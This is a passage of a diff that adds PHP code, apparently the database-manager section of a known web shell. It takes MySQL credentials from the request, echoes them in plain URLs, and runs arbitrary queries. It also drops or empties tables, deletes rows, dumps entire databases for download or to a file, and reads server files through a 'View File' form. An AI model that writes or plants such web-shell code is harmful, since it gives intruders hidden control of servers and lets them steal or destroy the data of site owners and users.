+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
